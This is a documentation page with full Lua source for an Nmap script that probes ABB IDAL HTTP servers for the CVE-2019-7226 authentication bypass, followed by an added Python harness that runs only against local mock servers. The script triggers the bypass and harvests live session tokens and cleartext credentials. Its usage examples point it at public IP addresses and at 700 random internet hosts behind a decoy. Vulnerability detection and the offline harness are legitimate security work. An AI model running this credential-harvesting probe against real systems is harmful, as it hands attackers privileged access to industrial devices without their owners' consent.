NSE LIB


abb-cve-2019-7226

Module Author: r00t-3xp10it {Disclosure = Eldar Marcussen}. NSE script to detect whether a target [ip]:[port][/url] is affected by CVE-2019-7226 (Improper Authentication). The ABB IDAL HTTP server CGI interface contains a URL that allows an unauthenticated attacker to bypass authentication and gain access to privileged functions. Specifically, /cgi/loginDefaultUser creates a session in an authenticated state and returns the session ID along with what may be the username and cleartext password of the user. An attacker can then supply an IDALToken value in a cookie, which will allow them to perform privileged operations such as restarting the service with /cgi/restart. The check is direct rather than banner-based: the script requests /cgi/loginDefaultUser itself and reports the target as vulnerable only when the response carries an IDALToken; the returned token and credentials are displayed but never used to call any other endpoint.

Ports

80-86 and 8080-8086 (tcp), or any open port whose service is identified as http, http-simple-new or http-proxy

Protocols

tcp (http)

Attribution

r00t-3xp10it

Usage

Copy the command and adjust the target or script arguments as needed.

nmap --script-help abb-cve-2019-7226.nse
nmap -sV -T4 -Pn -n -p 80-86,8080 --open --script abb-cve-2019-7226.nse 137.44.25.194
nmap -sV -Pn -n -p 80 --open --script abb-cve-2019-7226.nse --script-args "verbose=true" 137.44.25.194
nmap -sV -Pn -n -p 80 --open --script abb-cve-2019-7226.nse --script-args "uri=/vdeo/cgi/loginDefaultUser,verbose=true" 137.44.25.194
nmap -sS -Pn -p 80,86 --open --script abb-cve-2019-7226.nse --script-args "User-Agent=Apache-HttpClient/4.0.3,verbose=true" 50.117.40.77
nmap -sS -v -Pn -n -T4 -iR 700 -p 80-86,8080-8086 --open --script abb-cve-2019-7226.nse --script-args "verbose=true" -D 65.49.82.3
Script Source

---
-- Nmap NSE abb-cve-2019-7226.nse - Version 1.10
-- Copy to: /usr/share/nmap/scripts/abb-cve-2019-7226.nse
-- Update NSE database: sudo nmap --script-updatedb
-- execute: nmap --script-help abb-cve-2019-7226.nse
-- Port(s) accepted by this nse: 80-86,8080-8086
---

-- SCRIPT BANNER DESCRIPTION --
description = [[

Module Author: r00t-3xp10it {Disclosure = Eldar Marcussen}
NSE script to detect whether a target [ip]:[port][/url] is affected by CVE-2019-7226 (Improper Authentication).
The ABB IDAL HTTP server CGI interface contains a URL that allows an unauthenticated attacker to bypass authentication
and gain access to privileged functions. Specifically, /cgi/loginDefaultUser creates a session in an authenticated state
and returns the session ID along with what may be the username and cleartext password of the user. An attacker can then
supply an IDALToken value in a cookie, which will allow them to perform privileged operations such as restarting the service
with /cgi/restart.

Some Syntax examples:
nmap --script-help abb-cve-2019-7226.nse
nmap -sV -T4 -Pn -n -p 80-86,8080 --open --script abb-cve-2019-7226.nse 137.44.25.194
nmap -sV -Pn -n -p 80 --open --script abb-cve-2019-7226.nse --script-args "verbose=true" 137.44.25.194
nmap -sV -Pn -n -p 80 --open --script abb-cve-2019-7226.nse --script-args "uri=/vdeo/cgi/loginDefaultUser,verbose=true" 137.44.25.194
nmap -sS -Pn -p 80,86 --open --script abb-cve-2019-7226.nse --script-args "User-Agent=Apache-HttpClient/4.0.3,verbose=true" 50.117.40.77
nmap -sS -v -Pn -n -T4 -iR 700 -p 80-86,8080-8086 --open --script abb-cve-2019-7226.nse --script-args "verbose=true" -D 65.49.82.3

]]

---
-- @usage
-- nmap --script-help abb-cve-2019-7226.nse
-- nmap -sV -T4 -Pn -n -p 80-86,8080 --open --script abb-cve-2019-7226.nse 137.44.25.194
-- nmap -sV -Pn -n -p 80 --open --script abb-cve-2019-7226.nse --script-args "verbose=true" 137.44.25.194
-- nmap -sV -Pn -n -p 80 --open --script abb-cve-2019-7226.nse --script-args "uri=/vdeo/cgi/loginDefaultUser,verbose=true" 137.44.25.194
-- nmap -sS -Pn -p 80,86 --open --script abb-cve-2019-7226.nse --script-args "User-Agent=Apache-HttpClient/4.0.3,verbose=true" 50.117.40.77
-- nmap -sS -v -Pn -n -T4 -iR 700 -p 80-86,8080-8086 --open --script abb-cve-2019-7226.nse --script-args "verbose=true" -D 65.49.82.3
-- @output
-- PORT     STATE SERVICE VERSION
-- 80/tcp open  http  Apache httpd 2.4.38
-- | abb-cve-2019-7226:
-- |   VULNERABLE:
-- |   ABB IDAL HTTP server CGI (Improper Authentication)
-- |   State: VULNERABLE
-- |   IDs:  CVE:CVE-2019-7226
-- |   Risk factor: High  CVSSv3: 8.8 HIGH (AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
-- |     The ABB IDAL HTTP server CGI interface contains a URL that allows an unauthenticated attacker to bypass
-- |     authentication and gain access to privileged functions. Specifically, /cgi/loginDefaultUser creates a session
-- |     in an authenticated state and returns the session ID along with what may be the username and cleartext password
-- |     of the user. An attacker can then supply an IDALToken value in a cookie, which will allow them to perform privileged
-- |     operations such as restarting the service with /cgi/restart. A GET request to /cgi/loginDefaultUser may result in
-- |     '1 #S_OK IDALToken=532c8632b86694f0232a68a0897a145c admin admin' or a similar response.
-- |
-- |   Disclosure date: 2019-Feb-04
-- |   Exploit results:
-- |     Uri: http://192.168.1.71:80/cgi/loginDefaultUser
-- |     Auth-Cookie: IDALToken=008b1047k72068r6100a69b0381d007p
-- |     Credentials: admin : MyS3cr3t
-- |
-- |   References:
-- |     https://nvd.nist.gov/vuln/detail/CVE-2019-7226
-- |     https://www.akaoma.com/ressources/cve/gain-privilege/cve-2019-7226
-- |     https://packetstormsecurity.com/files/153402/ABB-IDAL-HTTP-Server-Authentication-Bypass.html
-- |_
-- @args abb-cve-2019-7226.verbose    Explain why a host was classified as not vulnerable   - Default: false
-- @args abb-cve-2019-7226.User-Agent User-Agent header to send in requests                 - Default: iPhone Safari user agent
-- @args abb-cve-2019-7226.uri        Path of the loginDefaultUser CGI on the target         - Default: /cgi/loginDefaultUser
-- (the short names verbose, User-Agent and uri are accepted as well, as in the examples above)
---


author = "r00t-3xp10it"
copyright = "Eldar Marcussen"
license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
-- Not 'safe': the check itself triggers the authentication bypass and makes the target
-- hand out a live session token and credentials, which Nmap classes as intrusive.
categories = {"vuln", "intrusive"}


-- DEPENDENCIES (lua nse libs) --
local http = require "http"
local table = require "table"
local vulns = require "vulns"
local string = require "string"
local stdnse = require "stdnse" --> nse args usage
local shortport = require "shortport"


-- THE RULE SECTION --
-- Scan only the selected ports/proto/service_names in 'open state'.
-- The service names must be a table: a single comma-separated string is compared
-- literally against port.service and would never match.
portrule = shortport.port_or_service({80, 81, 82, 83, 84, 85, 86, 8080, 8081, 8082, 8083, 8084, 8085, 8086}, {"http", "http-simple-new", "http-proxy"}, "tcp", "open")


-- THE ACTION SECTION --
action = function(host, port)
local verbose = tostring(stdnse.get_script_args(SCRIPT_NAME..".verbose") or "false")
if verbose == "1" then verbose = "true" end --> also accept a valueless 'verbose' argument
local uri = stdnse.get_script_args(SCRIPT_NAME..".uri") or "/cgi/loginDefaultUser"


-- Request headers: look like a browser and keep intermediaries from caching.
-- http.get() takes ONE options table; headers and request options must share it
-- (a fifth argument to http.get() is silently ignored, so redirect_ok/no_cache
-- would otherwise never take effect).
local options = {
   header = {},
   redirect_ok = false,    --> a 30x to a login page is not a hit; do not follow it
   no_cache = true,        --> always send the request, never answer from the NSE cache
   no_cache_body = true,
}
options.header['User-Agent'] = stdnse.get_script_args(SCRIPT_NAME..".User-Agent") or "Mozilla/5.0 (iPhone; CPU iPhone OS 12_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 Mobile/15E148 Safari/604.1" --> iPhone Safari User-Agent unless overridden
options.header['Accept-Language'] = "en-GB,en;q=0.8,sv"
options.header['Cache-Control'] = "no-store" --> ask caches along the path not to store request or response


-- Identify servers that answer [200] to invalid HTTP requests and abort,
-- as they would make the 'uri found' test meaningless (false positives).
-- Use the NSE debug channel instead of print(): scripts must not write to stdout.
local status_404, result_404 = http.identify_404(host, port)
if ( status_404 and result_404 == 200 ) then
   stdnse.debug1("%s:%d%s skipped: all URIs tested return status 200 (false positive)", host.ip, port.number, uri)
   return nil
end


-- Make sure that uri responds { no redirection | no_cache | no_cache_body }
-- [001] important check to be able to classify host.ip as state.vulnerable
-- Guard against a nil response (connection failure) before reading .status.
local response = http.get(host, port, uri, options)
local uri_found = "false"
if ( response and response.status ) then
   if (response.status == 200 or response.status == 401 or response.status == 403 or response.status == 405 or response.status == 500) then
      uri_found = "true"
   end
end


-- Make sure the auth cookie exists in response.body.
-- A body of the form '1 #S_OK IDALToken=<hex> <user> <pass>' shows that the
-- server is leaking a pre-authenticated session (and usually credentials).
-- [002] important check to be able to classify host.ip as state.vulnerable
local auth_stats = "false"
local cookie_value, capt_creds
if (response and response.body) then
   if (string.find(response.body, "IDALToken=", 1, true)) then
      auth_stats = "true"
      -- Capture the token and the two whitespace-separated fields that follow it
      -- (username and cleartext password). Anchoring on the token itself avoids
      -- indexing fixed positions of a tokenised body, which errored on short bodies.
      local token, user, pass = string.match(response.body, "(IDALToken=%S+)%s+(%S+)%s+(%S+)")
      if token then
         cookie_value = token
         capt_creds = user.." : "..pass
      else
         -- Token present but not followed by two fields: report what we have.
         cookie_value = string.match(response.body, "IDALToken=%S+") or "error retrieving auth token"
         capt_creds = "error retrieving credentials"
      end
   elseif (string.find(response.body, "#E_NEED_LOGIN", 1, true)) then
      auth_stats = "Authentication required"
   elseif (response.status == 401 or response.status == 403) then
      auth_stats = "Unauthorized/Forbidden"
   end
end


-- Build Nmap vulnerable {table}
local vuln_table = {
   title = "ABB IDAL HTTP server CGI (Improper Authentication)",
   state = vulns.STATE.NOT_VULN,
   IDS = {CVE = 'CVE-2019-7226'},
   risk_factor = "High",
   scores = {
      -- AV/AC/PR/UI/S are CVSS v3 metrics, so this is the v3 base score, not v2
      CVSSv3 = "8.8 HIGH (AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)",
   },
   description = [[
The ABB IDAL HTTP server CGI interface contains a URL that allows an unauthenticated attacker to bypass
authentication and gain access to privileged functions. Specifically, /cgi/loginDefaultUser creates a session
in an authenticated state and returns the session ID along with what may be the username and cleartext password
of the user. An attacker can then supply an IDALToken value in a cookie, which will allow them to perform privileged
operations such as restarting the service with /cgi/restart. A GET request to /cgi/loginDefaultUser may result in
'1 #S_OK IDALToken=532c8632b86694f0232a68a0897a145c admin admin' or a similar response.
]],
   references = {
     'https://nvd.nist.gov/vuln/detail/CVE-2019-7226',
     'https://www.akaoma.com/ressources/cve/gain-privilege/cve-2019-7226',
     'https://packetstormsecurity.com/files/153402/ABB-IDAL-HTTP-Server-Authentication-Bypass.html',
   },
   dates = {
      disclosure = {year = '2019', month = 'Feb', day = '04'},
   },
   exploit_results = {}, --> Display auth cookie and creds
}


-- Build vulnerable stdout (Display auth cookie and creds)
-- Plain concatenation: string.format() would choke on a '%' in the uri.
local target = "http://"..host.ip..":"..port.number..uri
if (uri_found == "true" and auth_stats == "true") then
   table.insert(vuln_table.exploit_results, "Uri: "..target)
   table.insert(vuln_table.exploit_results, "Auth-Cookie: "..(cookie_value or "error retrieving auth token"))
   table.insert(vuln_table.exploit_results, "Credentials: "..(capt_creds or "error retrieving credentials").."\n")
end


-- Final checks (uri_found|auth_stats)
-- Vulnerable: both checks succeeded. Otherwise stay silent unless verbose=true,
-- in which case explain the classification using the status actually received.
local not_vuln = "\n  ABB IDAL HTTP server CGI (Improper Authentication)\n  State: NOT VULNERABLE to CVE-2019-7226\n"
local status = (response and response.status) or "no response"
if (uri_found == "true" and auth_stats == "true") then
   vuln_table.state = vulns.STATE.VULN
   local report = vulns.Report:new(SCRIPT_NAME, host, port)
   return report:make_output(vuln_table)
elseif (verbose ~= "true") then
   return nil
elseif (uri_found == "false") then
   return not_vuln.."    Reason: ["..status.."] Uri Not Found in Response\n       Uri: "..target.."\n\n"
elseif (auth_stats == "Unauthorized/Forbidden" or auth_stats == "Authentication required") then
   return not_vuln.."    Reason: ["..status.."] "..auth_stats.."\n       Uri: "..target.."\n\n"..(response.body or "").."\n\n"
elseif ( not(response.body) ) then
   return not_vuln.."    Reason: ["..status.."] No response.body returned\n       Uri: "..target.."\n\n"
else
   return not_vuln.."    Reason: ["..status.."] Auth Cookie Not found\n       Uri: "..target.."\n\n"
end
end
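Offline harness for the two-step check the script performs, added here as an example; it is not part of the NSE script or of the original entry. It stands up three small local HTTP servers: one imitating a vulnerable IDAL CGI that answers /cgi/loginDefaultUser with the '1 #S_OK IDALToken=... admin admin' line quoted in the description, one imitating a fixed device that answers with the #E_NEED_LOGIN marker the script looks for (that exact body is constructed, not taken from a real device), and one that answers 200 to every path, the case http.identify_404 guards against. It then runs the script's logic in Python: probe an unlikely path to detect catch-all servers, request the login CGI, and classify the body by token, #E_NEED_LOGIN marker, or status code. All servers, ports and bodies are constructed, and nothing beyond 127.0.0.1 is contacted.

```python
"""Offline replica of the abb-cve-2019-7226 check (added example, constructed data only)."""
import http.client
import re
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

LOGIN_URI = "/cgi/loginDefaultUser"
# Vulnerable body per the advisory: '1 #S_OK IDALToken=<hex> <user> <pass>'
TOKEN_RE = re.compile(r"(IDALToken=\S+)\s+(\S+)\s+(\S+)")
# Statuses the NSE script treats as 'the CGI exists on this server'
INTERESTING = {200, 401, 403, 405, 500}


def classify(status, body):
    """Mirror the script's second check: what does one loginDefaultUser response tell us?"""
    if status not in INTERESTING:
        return ("not_found", None)
    if "IDALToken=" in body:
        m = TOKEN_RE.search(body)
        if m:
            return ("vulnerable", {"cookie": m.group(1), "user": m.group(2), "password": m.group(3)})
        # Token present but not followed by two fields: still a bypass, credentials unknown
        token = re.search(r"IDALToken=\S+", body)
        return ("vulnerable", {"cookie": token.group(0) if token else None, "user": None, "password": None})
    if "#E_NEED_LOGIN" in body:
        return ("auth_required", None)
    if status in (401, 403):
        return ("unauthorized", None)
    return ("no_cookie", None)


class _MockIDAL(BaseHTTPRequestHandler):
    """Tiny GET-only server; subclasses set `routes` and `catch_all` (constructed for this example)."""
    routes = {}          # path -> (status, body)
    catch_all = None     # (status, body) for unknown paths, or None for a real 404

    def do_GET(self):
        status, body = self.routes.get(self.path, self.catch_all or (404, "not found"))
        data = body.encode()
        self.send_response(status)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)

    def log_message(self, *_):   # silence per-request logging
        pass


def serve(routes, catch_all=None):
    handler = type("Handler", (_MockIDAL,), {"routes": routes, "catch_all": catch_all})
    srv = HTTPServer(("127.0.0.1", 0), handler)   # port 0: pick a free ephemeral port
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def fetch(port, path):
    conn = http.client.HTTPConnection("127.0.0.1", port, timeout=5)
    conn.request("GET", path, headers={"Cache-Control": "no-store"})
    resp = conn.getresponse()
    body = resp.read().decode(errors="replace")
    conn.close()
    return resp.status, body


def check_host(port, uri=LOGIN_URI):
    """Both steps of the NSE script: catch-all guard (identify_404), then the CGI request."""
    probe_status, _ = fetch(port, "/nse-probe-does-not-exist/")
    if probe_status == 200:
        return ("skipped", "server answers 200 to every path (false-positive guard)")
    return classify(*fetch(port, uri))


# Constructed test servers
VULN_BODY = "1 #S_OK IDALToken=532c8632b86694f0232a68a0897a145c admin admin"   # line quoted in the advisory
FIXED_BODY = "0 #E_NEED_LOGIN"                                                 # hypothetical patched reply
vulnerable = serve({LOGIN_URI: (200, VULN_BODY)})
fixed = serve({LOGIN_URI: (200, FIXED_BODY)})
catch_all = serve({}, catch_all=(200, "<html>welcome</html>"))


def demo():
    return {
        "vulnerable": check_host(vulnerable.server_port),
        "fixed": check_host(fixed.server_port),
        "catch_all": check_host(catch_all.server_port),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name:10s} -> {result}")
```

The same harness can be pointed at a spare lab device by replacing the mock servers with its address; the classification stays identical to what the NSE script reports, which makes it a convenient way to regression-test the script's parsing against real IDAL responses before scanning anything in production.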

Overview

Imported from the community mirror repository deadjakk/Unofficial-NSE-Repo because no upstream FROM.md reference was available for this folder.